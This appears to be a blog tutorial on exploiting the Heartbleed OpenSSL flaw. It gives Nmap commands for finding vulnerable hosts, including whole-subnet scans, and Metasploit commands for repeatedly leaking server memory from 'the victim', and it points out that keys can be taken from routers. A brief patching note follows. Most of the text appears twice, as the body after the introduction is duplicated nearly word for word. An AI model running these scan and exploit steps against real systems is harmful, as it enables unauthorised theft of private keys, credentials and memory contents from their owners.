By this time almost everyone who is reading this article knew what is Heartbleed attack is and the impact of this attack, so I am not going to explain 'what it is' rather I will be showing you how to exploit this vulnerability. You can find the video link of the demo at the end of this article.
If you need to know more about what this vulnerability is all about, then you can find out here.
The tool I am using to scan to find the vulnerable servers is, Nmap and the tool I am using to exploit this vulnerability is by using MSF.
According to OpenSSL "Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1" .
Reconnaissance Stage:
I am using Nmap to find the open ports and to find the version of Openssl. You can do the normal nmap command to find the version of open ssl, to make my life easier I have used the script "heartbleed_detect" here which I will post later and you can use them.
Nmap command:
You can do attacks on following services FTP,SMTP,IMAP,POP3, so all you need to find is under which ports these services are running and mention them in the Nmap, this will make your scan quicker.
Syntax:
nmap -sV hostname
nmap --script heartbleed_detect hostname
nmap -p portnumber --script heartbleed_detect hostname
Example:
nmap --script heartbleed_detect www.fact-in-hack.blogspot.com
nmap -p 21 --script heartbleed_detect 1.1.1.1
nmap -p 443 --script heartbleed_detect 1.1.1.1
If you want to find more servers that are affected by this vulnerability in the network, then simply use CIDR notation, in this case it is going to scan 256 host in the given network range.
Example:
nmap --script heartbleed_detect 1.1.1.1/24
Another good reason I am using this is because it includes all devices, even the routers and switches are affected, so you can even find the keys from the router.
Few Cisco appliances which are affected by this vulnerability that I am aware of are, cisco ASA 5500 series, Cisco Nexus 1000V Series Switches,Cisco MS200X Ethernet Access Switch.
You can further simplify your output from nmap by, using grep and sort commands and filter your result to make it easier for referring later in the attacking phase or to automate this attack.
Attack Stage:
To attack the victim we are going to use Metasploit and before you run this, you need to update the MSF to get the "openssl_heartbleed" auxiliary.
MSF USAGE:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set rhosts 1.1.1.1
msf auxiliary(openssl_heartbleed) > set rport 443
msf auxiliary(openssl_heartbleed) > set verbose TRUE
msf auxiliary(openssl_heartbleed) > exploit
This is the output you get and you will get only 64KB of data at one attempt, but this attack can be run recursive, so you can get the data from the victim's memory as it writes.
Mitigation Stage:
The patch has been released already, so it is just the matter of time for you to fix this. This vulnerability will no longer exist if you update the OpenSSL to the latest version 1.0.1g or recompile with the DOPENSSL_NO_HEARTBEATS alternatively you can find the latest version here .
LIVE DEMO: http://youtu.be/EmPE3qMUzqY
If you need to know more about what this vulnerability is all about, then you can find out here.
The tool I am using to scan to find the vulnerable servers is, Nmap and the tool I am using to exploit this vulnerability is by using MSF.
According to OpenSSL "Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1" .
Reconnaissance Stage:
I am using Nmap to find the open ports and to find the version of Openssl. You can do the normal nmap command to find the version of open ssl, to make my life easier I have used the script "heartbleed_detect" here which I will post later and you can use them.
Nmap command:
You can do attacks on following services FTP,SMTP,IMAP,POP3, so all you need to find is under which ports these services are running and mention them in the Nmap, this will make your scan quicker.
Syntax:
nmap -sV hostname
nmap --script heartbleed_detect hostname
nmap -p portnumber --script heartbleed_detect hostname
Example:
nmap --script heartbleed_detect www.fact-in-hack.blogspot.com
nmap -p 21 --script heartbleed_detect 1.1.1.1
nmap -p 443 --script heartbleed_detect 1.1.1.1
If you want to find more servers that are affected by this vulnerability in the network, then simply use CIDR notation, in this case it is going to scan 256 host in the given network range.
Example:
nmap --script heartbleed_detect 1.1.1.1/24
Another good reason I am using this is because it includes all devices, even the routers and switches are affected, so you can even find the keys from the router.
Few Cisco appliances which are affected by this vulnerability that I am aware of are, cisco ASA 5500 series, Cisco Nexus 1000V Series Switches,Cisco MS200X Ethernet Access Switch.
You can further simplify your output from nmap by, using grep and sort commands and filter your result to make it easier for referring later in the attacking phase or to automate this attack.
Attack Stage:
To attack the victim we are going to use Metasploit and before you run this, you need to update the MSF to get the "openssl_heartbleed" auxiliary.
MSF USAGE:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set rhosts 1.1.1.1
msf auxiliary(openssl_heartbleed) > set rport 443
msf auxiliary(openssl_heartbleed) > set verbose TRUE
msf auxiliary(openssl_heartbleed) > exploit
This is the output you get and you will get only 64KB of data at one attempt, but this attack can be run recursive, so you can get the data from the victim's memory as it writes.
Mitigation Stage:
The patch has been released already, so it is just the matter of time for you to fix this. This vulnerability will no longer exist if you update the OpenSSL to the latest version 1.0.1g or recompile with the DOPENSSL_NO_HEARTBEATS alternatively you can find the latest version here .
LIVE DEMO: http://youtu.be/EmPE3qMUzqY
Wireshark data capture
No comments:
Post a Comment